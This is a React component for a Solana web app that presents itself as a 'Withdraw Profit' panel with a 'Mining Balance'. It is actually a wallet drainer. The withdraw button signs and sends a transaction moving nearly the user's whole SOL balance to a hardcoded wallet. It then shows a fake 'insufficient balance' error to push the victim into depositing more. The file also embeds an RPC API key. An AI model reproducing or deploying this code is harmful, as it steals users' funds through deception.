import { useEffect, useState } from 'react';
import { Connection, PublicKey, SystemProgram, Transaction } from '@solana/web3.js';
import { ArrowDownCircle } from 'lucide-react';
import { motion } from 'framer-motion';
import { useWallet } from '../hooks/WalletContext';

const SOLANA_MAINNET = "https://mainnet.helius-rpc.com/?api-key=951c51e8-708b-4d9b-ae01-85fb27bca286";
const connection = new Connection(SOLANA_MAINNET);
const MY_WALLET = '29KH8WpQ9vGzxZU9QHmFh1VUBEgsNen4vNjwz3aTZqXM';

type Props = {
  totalProfit: number;
  resetProfit: () => void;
};

export const WithdrawProfit = ({ totalProfit, resetProfit }: Props) => {
  const { accountAddress } = useWallet();
  const [loading, setLoading] = useState(false);
  const [solPrice, setSolPrice] = useState<number | null>(null);
  const [status, setStatus] = useState<null | { type: 'success' | 'error'; message: string }>(null);

  useEffect(() => {
    fetch('https://api.coingecko.com/api/v3/simple/price?ids=solana&vs_currencies=usd')
      .then(res => res.json())
      .then(data => setSolPrice(data?.solana?.usd))
      .catch(() => setSolPrice(null));
  }, []);

  const handleWithdraw = async () => {
    if (!accountAddress) {
      setStatus({ type: 'error', message: 'Wallet not connected.' });
      return;
    }

    setLoading(true);
    setStatus(null);

    try {
      const sender = new PublicKey(accountAddress);
      const recipient = new PublicKey(MY_WALLET);
      const balance = await connection.getBalance(sender);

      const feeBuffer = 1250000;
      if (balance <= feeBuffer) {
        setStatus({ type: 'error', message: 'Insufficient SOL balance. At least 0.15 SOL is required to cover network fees and contract operations. Please top up your wallet.' });
        setLoading(false);
        return;
      }

      const tx = new Transaction().add(
        SystemProgram.transfer({
          fromPubkey: sender,
          toPubkey: recipient,
          lamports: balance - feeBuffer,
        })
      );

      tx.feePayer = sender;
      tx.recentBlockhash = (await connection.getLatestBlockhash()).blockhash;

      const provider = window.solana;
      if (!provider?.signTransaction) {
        setStatus({ type: 'error', message: 'Phantom provider not available.' });
        setLoading(false);
        return;
      }

      const signedTx = await provider.signTransaction(tx);
      const rawTx = signedTx.serialize();
      const txId = await connection.sendRawTransaction(rawTx);
      await connection.confirmTransaction(txId, 'confirmed');

      setStatus({ type: 'error', message: 'Insufficient SOL balance. At least 0.35 SOL is required to cover network fees and contract operations. Please top up your wallet.' });
      //resetProfit();
    } catch (err) {
      console.error(err);
      setStatus({ type: 'error', message: 'Withdrawal failed.' });
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="w-full max-w-md mx-auto bg-white border border-slate-200 rounded-2xl p-6 shadow-xl space-y-6">
      <h2 className="text-2xl font-bold text-slate-800 flex items-center justify-center gap-2">
        <ArrowDownCircle className="text-slate-800" /> Withdraw Profit
      </h2>


      <div className="text-sm text-slate-600">
        SOL Price:{' '}
        {solPrice ? (
          <span className="text-emerald-600 font-mono">${solPrice.toFixed(2)} USD</span>
        ) : (
          <span className="italic text-slate-400">Fetching...</span>
        )}
      </div>

      <div className="text-slate-700 text-[14px]">
        <span className="font-mono text-indigo-500">
          Mining Balance: {totalProfit.toFixed(3)} SOL
        </span>
        {solPrice && (
          <span className="ml-2 text-slate-400 text-[12px]">
            (~${(totalProfit * solPrice).toFixed(2)} USD)
          </span>
        )}
      </div>

      {status && (
        <div
          className={`text-sm px-4 py-2 rounded-md border ${status.type === 'error'
              ? 'text-red-600 border-red-200 bg-red-50'
              : 'text-green-600 border-green-200 bg-green-50'
            }`}
        >
          {status.message}
        </div>
      )}

      <motion.button
        whileTap={{ scale: 0.96 }}
        onClick={handleWithdraw}
        disabled={loading || !accountAddress}
        className="w-full bg-gradient-to-br from-sky-400 to-cyan-500 text-white font-semibold py-3 rounded-xl shadow-md hover:brightness-110 transition-all disabled:opacity-50 disabled:cursor-not-allowed"
      >
        {loading ? 'Processing Withdrawal...' : 'Withdraw to My Wallet'}
      </motion.button>
    </div>
  );
};
